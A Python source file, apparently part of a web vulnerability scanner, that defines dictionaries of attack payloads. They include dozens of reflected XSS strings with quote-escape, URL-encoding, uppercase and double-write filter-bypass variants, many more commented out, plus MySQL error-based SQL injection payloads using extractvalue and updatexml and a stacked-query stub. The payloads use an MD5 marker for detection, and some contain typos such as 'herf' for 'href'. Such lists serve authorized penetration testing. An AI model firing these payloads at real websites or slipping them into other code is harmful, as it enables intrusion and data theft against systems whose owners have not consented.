#coding utf-8
import re
from hashlib import md5

class sql_inject_payload:#注入payload字典
    encoded_string = "zx".encode('utf-8')
    change=f'\'{md5(encoded_string).hexdigest()}\''#变量，默认是MD5字符串，需要找数据库时可以改成database()
    #构造函数,作用是需要查database（）时通过参数改变payload的值
    def __init__(self,change=md5("zx".encode('utf-8')).hexdigest()):
        self.change=change
    #通过页面回显判断的注入
    xss_payload={
        #script标签,总共40个
        "xss脚本标签无逃逸":rf"<script>alert({change})</script>",
        "xss脚本标签单引号":rf"'<script>alert({change})</script>",
        "xss脚本标签双引号":rf'"<script>alert({change})</script>',
        "xss脚本标签单引反括号":rf"'><script>alert({change})</script><!--",
        "xss脚本标签双引反括号":rf'" ><script>alert({change})</script><!--',
        "xss脚本标签无逃逸编码":rf"%3cscript%3ealert({change})%3c%2fscript%3e",
        "xss脚本标签单引编码":rf"%27%3cscript%3ealert({change})%3c%2fscript%3e",
        "xss脚本标签双引编码":rf'%22%3cscript%3ealert({change})%3c%2fscript%3e',
        "xss脚本标签单引编码反括号":rf"%27%3cscript%3ealert({change})%3c%2fscript%3e%3c!--",
        "xss脚本标签双引编码反括号":rf'%22%3cscript%3ealert({change})%3c%2fscript%3e%3c!--',
        "xss脚本标签无逃逸大写":rf"<SCRIPT>ALERT({change})</SCRIPT>",
        "xss脚本标签单引号大写":rf"'<SCRIPT>ALERT({change})</SCRIPT>",
        "xss脚本标签双引号大写":rf'"<SCRIPT>ALERT({change})</SCRIPT>',
        "xss脚本标签单引反括号大写":rf"'><SCRIPT>ALERT({change})</SCRIPT><!--",
        "xss脚本标签双引反括号大写":rf'" ><SCRIPT>ALERT({change})</SCRIPT><!--',
        "xss脚本标签无逃逸大写编码":rf"%3cSCRIPT%3eALERT({change})%3c%2fSCRIPT%3e",
        "xss脚本标签单引编码大写":rf"%27%3cSCRIPT%3eALERT({change})%3c%2fSCRIPT%3e",
        "xss脚本标签双引编码大写":rf'%22%3cSCRIPT%3eALERT({change})%3c%2fSCRIPT%3e',
        "xss脚本标签单引编码反括号大写":rf"%27%3cSCRIPT%3eALERT({change})%3c%2fSCRIPT%3e%3c!--",
        "xss脚本标签双引编码反括号大写":rf'%22%3cSCRIPT%3eALERT({change})%3c%2fSCRIPT%3e%3c!--',
        "xss脚本标签无逃逸双写":rf"<scrscriptipt>alert({change})</scrscriptipt>",
        "xss脚本标签单引号双写":rf"'<scrscriptipt>alert({change})</scrscriptipt>",
        "xss脚本标签双引号双写":rf'"<scrscriptipt>alert({change})</scrscriptipt>',
        "xss脚本标签单引反括号双写":rf"'><scrscriptipt>alert({change})</scrscriptipt><!--",
        "xss脚本标签双引反括号双写":rf'" ><scrscriptipt>alert({change})</scrscriptipt><!--',
        "xss脚本标签无逃逸双写编码":rf"%3cscrscriptipt%3ealert({change})%3c%2fscrscriptipt%3e",
        "xss脚本标签单引编码双写":rf"%27%3cscrscriptipt%3ealert({change})%3c%2fscrscriptipt%3e",
        "xss脚本标签双引编码双写":rf'%22%3cscrscriptipt%3ealert({change})%3c%2fscrscriptipt%3e',
        "xss脚本标签单引编码反括号双写":rf"%27%3cscrscriptipt%3ealert({change})%3c%2fscrscriptipt%3e%3c!--",
        "xss脚本标签双引编码反括号双写":rf'%22%3cscrscriptipt%3ealert({change})%3c%2fscrscriptipt%3e%3c!--',
        "xss脚本标签无逃逸双写编码大写":rf"%3cSCRSCRIPTIPT%3eALERT({change})%3c%2fSCRSCRIPTIPT%3e",
        "xss脚本标签单引编码双写大写":rf"%27%3cSCRSCRIPTIPT%3eALERT({change})%3c%2fSCRSCRIPTIPT%3e",
        "xss脚本标签双引编码双写大写":rf'%22%3cSCRSCRIPTIPT%3eALERT({change})%3c%2fSCRSCRIPTIPT%3e',
        "xss脚本标签单引编码反括号双写大写":rf"%27%3cSCRSCRIPTIPT%3eALERT({change})%3c%2fSCRSCRIPTIPT%3e%3c!--",
        "xss脚本标签双引编码反括号双写大写":rf'%22%3cSCRSCRIPTIPT%3eALERT({change})%3c%2fSCRSCRIPTIPT%3e%3c!--',
        "xss脚本标签无逃逸双写编码大写双写":rf"%3cSCRSCRIPTIPT%3eALERT({change})%3c%2fSCRSCRIPTIPT%3e",
        "xss脚本标签单引编码双写编码大写":rf"%27%3cSCRSCRIPTIPT%3eALERT({change})%3c%2fSCRSCRIPTIPT%3e",
        "xss脚本标签双引编码双写编码大写":rf'%22%3cSCRSCRIPTIPT%3eALERT({change})%3c%2fSCRSCRIPTIPT%3e',
        "xss脚本标签无逃逸双写编码大写双写":rf"%3cSCRSCRIPTIPT%3eALERT({change})%3c%2fSCRSCRIPTIPT%3e",
        "xss脚本标签单引编码双写编码大写双写":rf"%27%3cSCRSCRIPTIPT%3eALERT({change})%3c%2fSCRSCRIPTIPT%3e",
        #img标签，总计40个
        #注释方便测试，实际使用解开注释
        #"xss图片标签无逃逸":rf"<img src=x onerror=alert({change})>",
        #"xss图片标签单引号":rf"'<img src=x onerror=alert({change})>",
        #"xss图片标签双引号":rf'"<img src=x onerror=alert({change})>',
        #"xss图片标签单引反括号":rf"'><img src=x onerror=alert({change})><!--",
        #"xss图片标签双引反括号":rf'" ><img src=x onerror=alert({change})><!--',
        #"xss图片标签无逃逸编码":rf"%3cimg%20src%3dx%20onerror%3dalert({change})%3e",
        #"xss图片标签单引编码":rf"%27%3cimg%20src%3dx%20onerror%3dalert({change})%3e",
        #"xss图片标签双引编码":rf'%22%3cimg%20src%3dx%20onerror%3dalert({change})%3e',
        #"xss图片标签单引编码反括号":rf"%27%3e%3cimg%20src=x%20onerror=alert({change})%3e%3c!--",
        #"xss图片标签双引编码反括号":rf'%22%3e%3cimg%20src=x%20onerror=alert({change})%3e%3c!--',
        #"xss图片标签无逃逸编码大写":rf"%3CIMG%20SRC%3Dx%20ONERROR%3DALERT({change})%3E",
        #"xss图片标签单引编码大写":rf"%27%3CIMG%20SRC%3Dx%20ONERROR%3DALERT({change})%3E",
        #"xss图片标签双引编码大写":rf'%22%3CIMG%20SRC%3Dx%20ONERROR%3DALERT({change})%3E',
        #"xss图片标签单引编码反括号大写":rf"%27%3E%3CIMG%20SRC=x%20onerror=ALERT({change})%3E%3C!--",
        #"xss图片标签双引编码反括号大写":rf'%22%3E%3CIMG%20SRC=x%20onerror=ALERT({change})%3E%3C!--',
        #"xss图片标签无逃逸大写":rf"<IMG SRC=x onerror=ALERT({change})>",
        #"xss图片标签单引号大写":rf"'<IMG SRC=x onerror=ALERT({change})>",
        #"xss图片标签双引号大写":rf'"<IMG SRC=x onerror=ALERT({change})>',
        #"xss图片标签单引反括号大写":rf"'><IMG SRC=x onerror=ALERT({change})><!--",
        #"xss图片标签双引反括号大写":rf'" ><IMG SRC=x onerror=ALERT({change})><!--',
        #"xss图片标签无逃逸双写on":rf"<img src=x oonnerror=alert({change})>",
        #"xss图片标签单引号双写on":rf"'<img src=x oonnerror=alert({change})>",
        #"xss图片标签双引双写on":rf'"<img src=x oonnerror=alert({change})>',
        #"xss图片标签单引反括号双写on":rf"'><img src=x oonnerror=alert({change})><!--",
        #"xss图片标签双引反括号双写on":rf'" ><img src=x oonnerror=alert({change})><!--',
        #"xss图片标签无逃逸双写on大写":rf"<IMG SRC=x oonnERROR=ALERT({change})>",
        #"xss图片标签单引双写on大写":rf"'<IMG SRC=x oonnERROR=ALERT({change})>",
        #"xss图片标签双引双写on大写":rf'"<IMG SRC=x oonnERROR=ALERT({change})>',
        #"xss图片标签单引反括号on双写":rf"'><IMG SRC=x oonnerror=ALERT({change})><!--",
        #"xss图片标签双引反括号on双写":rf'" ><IMG SRC=x oonnerror=ALERT({change})><!--',
        #"xss图片标签无逃逸双写on编码":rf"%3cimg%20src%3dx%20oonnerror%3dalert({change})%3e",
        #"xss图片标签单引编码双写on":rf"%27%3cimg%20src%3dx%20oonnerror%3dalert({change})%3e",
        #"xss图片标签双引编码双写on":rf'%22%3cimg%20src%3dx%20oonnerror%3dalert({change})%3e',
        #"xss图片标签单引反括号双写on编码":rf"%27%3e%3cimg%20src%3dx%20oonnerror%3dalert({change})%3e%3c!--",
        #"xss图片标签双引反括号双写on编码":rf'%22%3e%3cimg%20src%3dx%20oonnerror%3dalert({change})%3e%3c!--',
        #"xss图片标签无逃逸双写on编码大写":rf"%3CIMG%20SRC%3Dx%20oonnERROR%3DALERT({change})%3E",
        #"xss图片标签单引编码双写on大写":rf"%27%3CIMG%20SRC%3Dx%20oonnERROR%3DALERT({change})%3E",
        #"xss图片标签双引编码双写on大写":rf'%22%3CIMG%20SRC%3Dx%20oonnERROR%3DALERT({change})%3E',
        #"xss图片标签单引反括号双写on编码大写":rf"%27%3E%3CIMG%20SRC%3Dx%20oonnerror%3dALERT({change})%3E%3C!--",
        #"xss图片标签双引编码双写on编码大写":rf'%22%3CIMG%20SRC%3Dx%20oonnERROR%3DALERT({change})%3E',
        ##伪协议总共40个
        #"xss伪协议无逃逸":rf"<a herf='javascript:alert({change})'>",
        #"xss伪协议单引号":rf"'<a herf='javascript:alert({change})'>",
        #"xss伪协议双引号":rf'"<a herf="javascript:alert({change})">',
        #"xss伪协议单引反括号":rf"'><a herf='javascript:alert({change})'><!--",
        #"xss伪协议双引反括号":rf'" ><a herf="javascript:alert({change})"><!--',
        #"xss伪协议无逃逸编码":rf"%3ca%20herf%3d%27javascript%3aalert({change})%27%3e",
        #"xss伪协议单引编码":rf"%27%3ca%20herf%3d%27javascript%3aalert({change})%27%3e",
        #"xss伪协议双引编码":rf'%22%3ca%20herf%3d%22javascript%3aalert({change})%22%3e',
        #"xss伪协议单引编码反括号":rf"%27%3e%3ca%20herf%3d%27javascript%3aalert({change})%27%3e%3c!--",
        #"xss伪协议双引编码反括号":rf'%22%3e%3ca%20herf%3d%22javascript%3aalert({change})%22%3e%3c!--',
        #"xss伪协议无逃逸大写":rf"<A HERF='JAVASCRIPT:ALERT({change})'>",
        #"xss伪协议单引大写":rf"'<A HERF='JAVASCRIPT:ALERT({change})'>",
        #"xss伪协议双引大写":rf'"<A HERF="JAVASCRIPT:ALERT({change})">',
        #"xss伪协议单引反括号大写":rf"'><A HERF='JAVASCRIPT:ALERT({change})'><!--",
        #"xss伪协议双引反括号大写":rf'" ><A HERF="JAVASCRIPT:ALERT({change})"><!--',
        #"xss伪协议无逃逸编码大写":rf"%3CA%20HERF%3D%27JAVASCRIPT%3AALERT({change})%27%3E",
        #"xss伪协议单引编码大写":rf"%27%3CA%20HERF%3D%27JAVASCRIPT%3AALERT({change})%27%3E",
        #"xss伪协议双引编码大写":rf'%22%3CA%20HERF%3D%22JAVASCRIPT%3AALERT({change})%22%3E',
        #"xss伪协议单引反括号编码":rf"%27%3E%3CA%20HERF%3D%27JAVASCRIPT%3AALERT({change})%27%3E%3C!--",
        #"xss伪协议双引反括号编码":rf'%22%3E%3CA%20HERF%3D%22JAVASCRIPT%3AALERT({change})%22%3E%3C!--',
        #"xss伪协议无逃逸双写javascript":rf"<a herf='javasjavascriptcript:alert({change})'>",
        #"xss伪协议单引双写javascript":rf"'<a herf='javasjavascriptcript:alert({change})'>",
        #"xss伪协议双引双写javascript":rf'"<a herf="javasjavascriptcript:alert({change})">',
        #"xss伪协议单引反括号双写javascript":rf"'><a herf='javasjavascriptcript:alert({change})'><!--",
        #"xss伪协议双引双写javascript":rf'" ><a herf="javasjavascriptcript:alert({change})"><!--',
        #"xss伪协议无逃逸编码双写javascript":rf"%3ca%20herf%3d%27javasjavascriptcript%3aalert({change})%27%3e",
        #"xss伪协议单引编码双写javascript":rf"%27%3ca%20herf%3d%27javasjavascriptcript%3aalert({change})%27%3e",
        #"xss伪协议双引编码双写javascript":rf'%22%3ca%20herf%3d%22javasjavascriptcript%3aalert({change})%22%3e',
        #"xss伪协议单引反括号编码双写javascript":rf"%27%3e%3ca%20herf%3d%27javasjavascriptcript%3aalert({change})%27%3e%3c!--",
        #"xss伪协议双引反括号编码双写javascript":rf'%22%3e%3ca%20herf%3d%22javasjavascriptcript%3aalert({change})%22%3e%3c!--',
        #"xss伪协议无逃逸双写javascript大写":rf"<A HERF='JAVASJAVASCRIPTCRIPT:ALERT({change})'>",
        #"xss伪协议单引双写javascript大写":rf"'<A HERF='JAVASJAVASCRIPTCRIPT:ALERT({change})'>",
        #"xss伪协议双引双写javascript大写":rf'"<A HERF="JAVASJAVASCRIPTCRIPT:ALERT({change})">',
        #"xss伪协议单引反括号双写javascript大写":rf"'><A HERF='JAVASJAVASCRIPTCRIPT:ALERT({change})'><!--",
        #"xss伪协议双引反括号双写javascript大写":rf'" ><A HERF="JAVASJAVASCRIPTCRIPT:ALERT({change})"><!--',
        #"xss伪协议无逃逸编码双写javascript大写":rf"%3CA%20HERF%3D%27JAVASJAVASCRIPTCRIPT%3AALERT({change})%27%3E",
        #"xss伪协议单引编码双写javascript大写":rf"%27%3CA%20HERF%3D%27JAVASJAVASCRIPTCRIPT%3AALERT({change})%27%3E",
        #"xss伪协议双引编码双写javascript大写":rf'%22%3CA%20HERF%3D%22JAVASJAVASCRIPTCRIPT%3AALERT({change})%22%3E',
        #"xss伪协议单引反括号编码双写javascript大写":rf"%27%3E%3CA%20HERF%3D%27JAVASJAVASCRIPTCRIPT%3AALERT({change})%27%3E%3C!--",
        #"xss伪协议双引编码双写javascript大写":rf'%22%3E%3CA%20HERF%3D%22JAVASJAVASCRIPTCRIPT%3AALERT({change})%22%3E%3C!--',
        ##无标签总共64条
        #"xss无标签无逃逸":rf"alert({change})",
        #"xss无标签单引号":rf"'alert({change})",
        #"xss无标签双引号":rf'"alert({change})',
        #"xss无标签img无逃逸":rf"src=x onerror=alert({change})",
        #"xss无标签img单引号":rf"'src=x onerror=alert({change})",
        #"xss无标签img双引号":rf'"src=x onerror=alert({change})',
        #"xss无标签伪协议无逃逸":rf"herf=javascript:alert({change})",
        #"xss无标签伪协议单引号":rf"'herf=javascript:alert({change})",
        #"xss无标签伪协议双引号":rf'"herf=javascript:alert({change})',
        #"xss无标签伪协议无逃逸2型":rf"javascript:alert({change})",
        #"xss无标签无逃逸编码":rf"%3calert%28{change}%29%3e",
        #"xss无标签单引号编码":rf"%27alert%28{change}%29%27",
        #"xss无标签双引号编码":rf'%22alert%28{change}%29%22',
        #"xss无标签伪协议无逃逸编码":rf"%3cherf%3djavascript%3aalert%28{change}%29%3e",
        #"xss无标签伪协议单引号编码":rf"%27herf%3djavascript%3aalert%28{change}%29%27",
        #"xss无标签伪协议双引号编码":rf'%22herf%3djavascript%3aalert%28{change}%29%22',
        #"xss无标签伪协议无逃逸2型编码":rf"%3cjavascript:alert%28{change}%29%3e",
        #"xss无标签img无逃逸编码":rf"src=x%20onerror=alert%28{change}%29",
        #"xss无标签img单引号编码":rf"%27src=x%20onerror=alert%28{change}%29",
        #"xss无标签img双引号编码":rf'%22src=x%20onerror=alert%28{change}%29',
        #"xss无标签无逃逸大写":rf"ALERT({change})",
        #"xss无标签单引号大写":rf"'ALERT({change})",
        #"xss无标签双引号大写":rf'"ALERT({change})',
        #"xss无标签伪协议无逃逸大写":rf"HERF=JAVASCRIPT:ALERT({change})",
        #"xss无标签伪协议单引号大写":rf"'HERF=JAVASCRIPT:ALERT({change})",
        #"xss无标签伪协议双引号大写":rf'"HERF=JAVASCRIPT:ALERT({change})',
        #"xss无标签伪协议无逃逸2型大写":rf"JAVASCRIPT:ALERT({change})",
        #"xss无标签img无逃逸大写":rf"SRC=X%20ONERROR=ALERT({change})",
        #"xss无标签img单引号大写":rf"'SRC=X%20ONERROR=ALERT({change})",
        #"xss无标签img双引号大写":rf'"SRC=X%20ONERROR=ALERT({change})',
        #"xss无标签伪协议无逃逸双写":rf"herf=javasjavascriptcript:alert({change})",
        #"xss无标签伪协议单引双写":rf"'herf=javasjavascriptcript:alert({change})",
        #"xss无标签伪协议双引双写":rf'"herf=javasjavascriptcript:alert({change})',
        #"xss无标签伪协议无逃逸2型双写":rf"javasjavascriptcript:alert({change})",
        #"xss无标签img无逃逸双写":rf"src=x%20oonnerror=alert({change})",
        #"xss无标签img单引双写":rf"'src=x%20oonnerror=alert({change})",
        #"xss无标签img双引双写":rf'"src=x%20oonnerror=alert({change})"',
        #"xss无标签双写伪协议无逃逸编码":rf"%3cherf%3djavasjavascriptcript%3aalert%28{change}%29%3e",
        #"xss无标签双写伪协议单引号编码":rf"%27herf%3djavasjavascriptcript%3aalert%28{change}%29%27",
        #"xss无标签双写伪协议双引号编码":rf'%22herf%3djavascjavascriptript%3aalert%28{change}%29%22',
        #"xss无标签双写伪协议无逃逸2型编码":rf"%3cjavascjavascriptript:alert%28{change}%29%3e",
        #"xss无标签双写img无逃逸编码":rf"src=x%20oonnerror=alert%28{change}%29",
        #"xss无标签双写img单引号编码":rf"%27src=x%20oonnerror=alert%28{change}%29",
        #"xss无标签双写img双引号编码":rf'%22src=x%20oonnerror=alert%28{change}%29',
        #"xss无标签无逃逸编码大写":rf"%3CALERT%28{change}%29%3E",
        #"xss无标签单引号编码大写":rf"%27ALERT%28{change}%29%27",
        #"xss无标签双引号编码大写":rf'%22ALERT%28{change}%29%22',
        #"xss无标签伪协议无逃逸编码大写":rf"%3CHERF%3DJAVASCRIPT%3AALERT%28{change}%29%3E",
        #"xss无标签伪协议单引号编码大写":rf"%27HERF%3DJAVASCRIPT%3AALERT%28{change}%29%27",
        #"xss无标签伪协议双引号编码大写":rf'%22HERF%3DJAVASCRIPT%3AALERT%28{change}%29%22',
        #"xss无标签伪协议无逃逸2型编码大写":rf"%3CJAVASCRIPT:ALERT%28{change}%29%3E",
        #"xss无标签img无逃逸编码大写":rf"SRC=X%20ONERROR=ALERT%28{change}%29",
        #"xss无标签img单引号编码大写":rf"'SRC=X%20ONERROR=ALERT%28{change}%29",
        #"xss无标签img双引号编码大写":rf'"SRC=X%20ONERROR=ALERT%28{change}%29',
        #"xss无标签无逃逸编码大写双写":rf"%3CALERT%28{change}%29%3E",
        #"xss无标签单引号编码大写双写":rf"%27ALERT%28{change}%29%27",
        #"xss无标签双引号编码大写双写":rf'"ALERT%28{change}%29%22',
        #"xss无标签伪协议无逃逸编码大写双写":rf"%3CHERF%3DJAVASCJAVASCRIPTRIPT%3AALERT%28{change}%29%3E",
        #"xss无标签伪协议单引号编码大写双写":rf"%27HERF%3DJAVASCJAVASCRIPTRIPT%3AALERT%28{change}%29%27",
        #"xss无标签伪协议双引号编码大写双写":rf'"HERF%3DJAVASCJAVASCRIPTRIPT%3AALERT%28{change}%29%22',
        #"xss无标签伪协议无逃逸2型编码大写双写":rf"%3CJAVASCJAVASCRIPTRIPT:ALERT%28{change}%29%3E",
        #"xss无标签img无逃逸编码大写双写":rf"SRC=X%20OONNERROR=ALERT%28{change}%29", 
        #"xss无标签img单引号编码大写双写":rf"%27SRC=X%20OONNERROR=ALERT%28{change}%29",
        #"xss无标签img双引号编码大写双写":rf'%22SRC=X%20OONNERROR=ALERT%28{change}%29',
    } 
    error_payload={
        #报错注入群
        "sql报错注入单引号extractvalue(--)":rf"1'union SELECT extractvalue(1,concat(0x7e,{change})) -- a",#到时候通过md5(zx)的结果检查页面是否返回我们需要的对象
        "sql报错注入双引号extractvalue(--)":f"1\"union SELECT extractvalue(1,concat(0x7e,{change})) -- a",
        "sql报错注入单引号extractvalue(#)":rf"1'union SELECT extractvalue(1,concat(0x7e,{change})) #",#到时候通过md5(zx)的结果检查页面是否返回我们需要的对象
        "sql报错注入双引号extractvalue(#)":f"1\"union SELECT extractvalue(1,concat(0x7e,{change})) #",
        "sql报错注入纯数字extractvalue(--)":rf"999 union SELECT extractvalue(1,concat(0x7e,{change})) -- a",
        "sql报错注入纯数字extractvalue(#)":rf"999 union SELECT extractvalue(1,concat(0x7e,{change})) #",
        "sql报错注入单引号updatexml(or)":rf"1'or updatexml(1,concat(0x7e,{change}),1) or'",
        "sql报错注入双引号updatexml(or)":f"1\"or updatexml(1,concat(0x7e,{change}),1) or \"",
        "sql报错注入单引号updatexml(#)":rf"1'or updatexml(1,concat(0x7e,{change}),1) #",
        "sql报错注入双引号updatexml(#)":f"1\"or updatexml(1,concat(0x7e,{change}),1) #",
        "sql报错注入单引号updatexml(--)":rf"1'or updatexml(1,concat(0x7e,{change}),1) -- a",
        "sql报错注入双引号updatexml(--)":f"1\"or updatexml(1,concat(0x7e,{change}),1) -- a",
        "sql报错注入纯数字updatexml(or)":rf"999 or updatexml(1,concat(0x7e,{change}),1) or'",
        "sql报错注入纯数字updatexml(#)":rf"999 or updatexml(1,concat(0x7e,{change}),1) #",
        "sql报错注入纯数字updatexml(--)":rf"999 or updatexml(1,concat(0x7e,{change}),1) -- a",
    }
    #通过响应时间判断的注入

    #其他判断方式的注入
    duidie_payload={
        "单引号堆叠(or)":r"';"
    }
    #宽字节注入,不测，太狭隘了